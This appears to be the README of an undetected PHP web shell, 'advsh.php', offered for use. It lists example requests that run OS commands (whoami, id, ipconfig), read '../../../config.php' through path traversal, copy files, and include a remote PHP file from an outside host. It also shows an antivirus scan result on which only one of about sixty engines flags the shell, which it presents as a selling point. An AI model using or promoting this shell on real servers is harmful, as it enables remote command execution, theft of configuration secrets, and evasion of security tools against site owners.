Allow to use native PHP functions and OS commands.
- f= PHP function.
- p1= First parameter.
- p2= Second parameter.
- advsh.php?f=getcwd
- advsh.php?f=scandir&p1=..
- advsh.php?f=system&p1=whoami
- advsh.php?f=system&p1=id
- advsh.php?f=system&p1=ipconfig
- advsh.php?f=hash&y=teste&p1=sha256
- advsh.php?f=copy&p1=teste.php&p2=teste.bkp
- advsh.php?f=readfile&p1=../../../config.php
- advsh.php?f=include&p1=https//www.brztec.com/file.php
- and much more...
Detection: 01 in 60.
Obs.: bellow is only for reference, check the above link for updates.
- Tencent: BK.YDWebShell.PHP.Smalleval.ek
- Acronis (Static ML): Undetected
- AhnLab-V3: Undetected
- ALYac: Undetected
- Antiy-AVL: Undetected
- Arcabit: Undetected
- Avast: Undetected
- AVG: Undetected
- Avira (no cloud): Undetected
- Baidu: Undetected
- BitDefender: Undetected
- BitDefenderTheta: Undetected
- Bkav Pro: Undetected
- ClamAV: Undetected
- CMC: Undetected
- Cynet: Undetected
- Cyren: Undetected
- DrWeb: Undetected
- Emsisoft: Undetected
- eScan: Undetected
- ESET-NOD32: Undetected
- F-Secure: Undetected
- Fortinet: Undetected
- GData: Undetected
- Google: Undetected
- Gridinsoft (no cloud): Undetected
- Ikarus: Undetected
- Jiangmin: Undetected
- K7AntiVirus: Undetected
- K7GW: Undetected
- Kaspersky: Undetected
- Kingsoft: Undetected
- Lionic: Undetected
- Malwarebytes: Undetected
- MAX: Undetected
- MaxSecure: Undetected
- McAfee: Undetected
- McAfee-GW-Edition: Undetected
- Microsoft: Undetected
- NANO-Antivirus: Undetected
- Panda: Undetected
- QuickHeal: Undetected
- Rising: Undetected
- Sangfor Engine Zero: Undetected
- Sophos: Undetected
- SUPERAntiSpyware: Undetected
- Symantec: Undetected
- TACHYON: Undetected
- Trellix (FireEye): Undetected
- TrendMicro: Undetected
- TrendMicro-HouseCall: Undetected
- VBA32: Undetected
- VIPRE: Undetected
- VirIT: Undetected
- ViRobot: Undetected
- Xcitium: Undetected
- Yandex: Undetected
- Zillya: Undetected
- ZoneAlarm by Check Point: Undetected
- Zoner: Undetected
- Alibaba: Unable to process file type
- Avast-Mobile: Unable to process file type
- BitDefenderFalx: Unable to process file type
- CrowdStrike Falcon: Unable to process file type
- Cybereason: Unable to process file type
- Cylance: Unable to process file type
- Elastic: *Unable to process file typev
- Palo Alto Networks: Unable to process file type
- SecureAge: Unable to process file type
- SentinelOne (Static ML): Unable to process file type
- Symantec Mobile Insight: Unable to process file type
- TEHTRIS: Unable to process file type
- Trapmine: Unable to process file type
- Trustlook: Unable to process file type
- Webroot: Unable to process file type